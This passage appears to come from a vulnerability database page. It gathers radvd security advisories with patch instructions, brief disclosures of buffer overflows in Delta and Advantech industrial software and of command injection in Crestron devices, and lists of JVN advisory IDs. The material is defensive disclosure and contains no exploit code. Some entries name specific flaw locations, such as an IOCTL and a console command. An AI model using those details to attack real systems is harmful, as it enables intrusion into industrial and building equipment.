mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool. Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/ ---------------------------------------------------------------------- TITLE: Fedora update for radvd SECUNIA ADVISORY ID: SA46626 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46626/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46626 RELEASE DATE: 2011-10-29 DISCUSS ADVISORY: http://secunia.com/advisories/46626/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46626/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46626 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Fedora has issued an update for radvd. For more information: SA46200 SOLUTION: Apply updated packages via the yum utility ("yum update radvd"). ORIGINAL ADVISORY: FEDORA-2011-14000: http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068481.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of bit memory from a DVB file. A crafted length element can trigger an overflow of a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwCLRptw.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
var-201806-1058 Crestron TSW-1060, TSW-760, TSW-560, TSW-1060-NC, TSW-760-NC, and TSW-560-NC devices before 2.001.0037.001 allow unauthenticated remote code execution via a Bash shell service in Crestron Toolbox Protocol (CTP). plural Crestron Device and code injection vulnerabilities exist.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Crestron's Android-based products. Authentication is required to exploit this vulnerability.The specific flaw exists within the ADDUSER command of the CTP console. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker could leverage this vulnerability to execute code with root privileges. CrestronTSW-1060 and other are touch screen devices of Crestron Electronics of the United States. There are security vulnerabilities in several Crestron products. Multiple OS command-injection vulnerabilities. 2. An access-bypass vulnerability. 3. A security-bypass vulnerability. Attackers can exploit these issues to execute arbitrary OS commands and bypass certain security restrictions, perform unauthorized actions, or gain sensitive information within the context of the affected system. Failed exploit attempts will likely result in denial of service conditions
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
jvndb-2025-000029 Multiple vulnerabilities in Quick Agent 2025-04-25T13:49+09:00 2025-04-25T13:49+09:00
jvndb-2025-000028 i-PRO Configuration Tool vulnerable to use of hard-coded cryptographic key 2025-04-24T13:50+09:00 2025-04-24T13:50+09:00
jvndb-2025-000027 Active! mail vulnerable to stack-based buffer overflow 2025-04-18T16:50+09:00 2025-04-18T16:50+09:00
jvndb-2016-000129 Android OS issue where it is affected by the CRIME attack 2016-07-25T11:15+09:00 2025-04-18T16:36+09:00
jvndb-2025-003213 TP-Link Deco BE65 Pro vulnerable to OS command injection 2025-04-11T13:52+09:00 2025-04-11T13:52+09:00
jvndb-2025-000026 Multiple vulnerabilities in BizRobo! 2025-04-10T15:36+09:00 2025-04-10T15:36+09:00
jvndb-2025-003091 Multiple vulnerabilities in Trend Micro Endpoint security products for enterprises (April 2025) 2025-04-09T14:55+09:00 2025-04-09T14:55+09:00
jvndb-2025-002990 Multiple vulnerabilities in Inaba Denki Sangyo Wi-Fi AP UNIT 'AC-WPS-11ac series' 2025-04-07T17:44+09:00 2025-04-07T17:44+09:00
jvndb-2025-002714 Improper symbolic link file handling in FutureNet NXR series, VXR series and WXR series routers 2025-03-31T16:59+09:00 2025-04-03T15:19+09:00
jvndb-2025-000025 WinRAR vulnerable to the symbolic link based "Mark of the Web" check bypass 2025-04-03T12:29+09:00 2025-04-03T12:29+09:00
jvndb-2025-000022 Multiple vulnerabilities in JTEKT ELECTRONICS CORPORATION's products 2025-04-02T15:12+09:00 2025-04-02T15:12+09:00
jvndb-2025-002790 Out-of-bounds Write vulnerabilities in Canon Printer Drivers for Production Printers, Office/Small Office Multifunction Printers and Laser Printers 2025-04-02T15:05+09:00 2025-04-02T15:05+09:00
jvndb-2025-000023 WordPress plugin "Welcart e-Commerce" vulnerable to untrusted data deserialization 2025-04-01T14:20+09:00 2025-04-01T14:20+09:00
jvndb-2024-003016 Multiple vulnerabilities in home gateway HGW BL1500HM 2024-03-25T17:28+09:00 2025-03-28T12:01+09:00
jvndb-2025-000018 Multiple vulnerabilities in home gateway HGW-BL1500HM 2025-03-19T15:33+09:00 2025-03-28T11:48+09:00
jvndb-2025-000024 a-blog cms vulnerable to untrusted data deserialization 2025-03-28T10:46+09:00 2025-03-28T10:46+09:00
jvndb-2025-000021 Multiple vulnerabilities in PowerCMS 2025-03-26T18:13+09:00 2025-03-26T18:13+09:00
jvndb-2025-002592 Multiple vulnerabilities in CHOCO TEI WATCHER mini 2025-03-26T13:25+09:00 2025-03-26T13:25+09:00
jvndb-2025-000019 Multiple vulnerabilities in AssetView 2025-03-25T17:10+09:00 2025-03-25T17:10+09:00
jvndb-2024-000117 Stack-based buffer overflow vulnerability in multiple Ricoh laser printers and MFPs which implement Web Image Monitor 2024-10-31T16:44+09:00 2025-03-25T11:39+09:00
jvndb-2025-000020 +F FS010M vulnerable to OS command injection 2025-03-18T15:01+09:00 2025-03-18T15:01+09:00
jvndb-2025-000017 hostapd vulnerable to improper processing of RADIUS packets 2025-03-12T14:19+09:00 2025-03-12T14:19+09:00
jvndb-2025-000016 Multiple vulnerabilities in RemoteView Agent (for Windows) 2025-03-06T14:27+09:00 2025-03-10T15:22+09:00
jvndb-2025-001898 Multiple vulnerabilities in FutureNet AS series (Industrial Routers) and FA series (Protocol Conversion Machine) 2025-03-04T14:56+09:00 2025-03-04T14:56+09:00
jvndb-2025-001605 "RoboForm Password Manager" App for Android vulnerable to authentication bypass using an alternate path or channel 2025-02-20T20:15+09:00 2025-02-20T20:15+09:00
jvndb-2025-000004 Multiple vulnerabilities in I-O DATA router UD-LT2 2025-01-22T13:55+09:00 2025-02-20T15:55+09:00
jvndb-2025-000014 Multiple cross-site scripting vulnerabilities in Movable Type 2025-02-19T16:19+09:00 2025-02-19T16:19+09:00
jvndb-2025-000015 RevoWorks SCVX and RevoWorks Browser vulnerable to incorrect resource transfer between spheres 2025-02-19T14:51+09:00 2025-02-19T14:51+09:00
jvndb-2025-001563 Out-of-bounds write vulnerability in FUJIFILM Business Innovation Corp. MFPs 2025-02-18T16:33+09:00 2025-02-18T16:33+09:00
jvndb-2025-001562 Out-of-bounds read vulnerability in OMRON CX-Programmer 2025-02-18T16:24+09:00 2025-02-18T16:24+09:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2025-001 TS-2025-001
ts-2024-013 TS-2024-013
ts-2024-012 TS-2024-012
ts-2024-011 TS-2024-011
ts-2024-010 TS-2024-010
ts-2024-009 TS-2024-009
ts-2024-008 TS-2024-008
ts-2024-007 TS-2024-007
ts-2024-006 TS-2024-006
ts-2024-005 TS-2024-005
ts-2024-004 TS-2024-004
ts-2024-003 TS-2024-003
ts-2024-002 TS-2024-002
ts-2024-001 TS-2024-001
ts-2023-009 TS-2023-009
ts-2023-008 TS-2023-008
ts-2023-007 TS-2023-007
ts-2023-006 TS-2023-006
ts-2023-005 TS-2023-005
ts-2023-004 TS-2023-004
ts-2023-003 TS-2023-003
ts-2023-002 TS-2023-002
ts-2023-001 TS-2023-001
ts-2022-005 TS-2022-005
ts-2022-004 TS-2022-004
ts-2022-003 TS-2022-003
ts-2022-002 TS-2022-002
ts-2022-001 TS-2022-001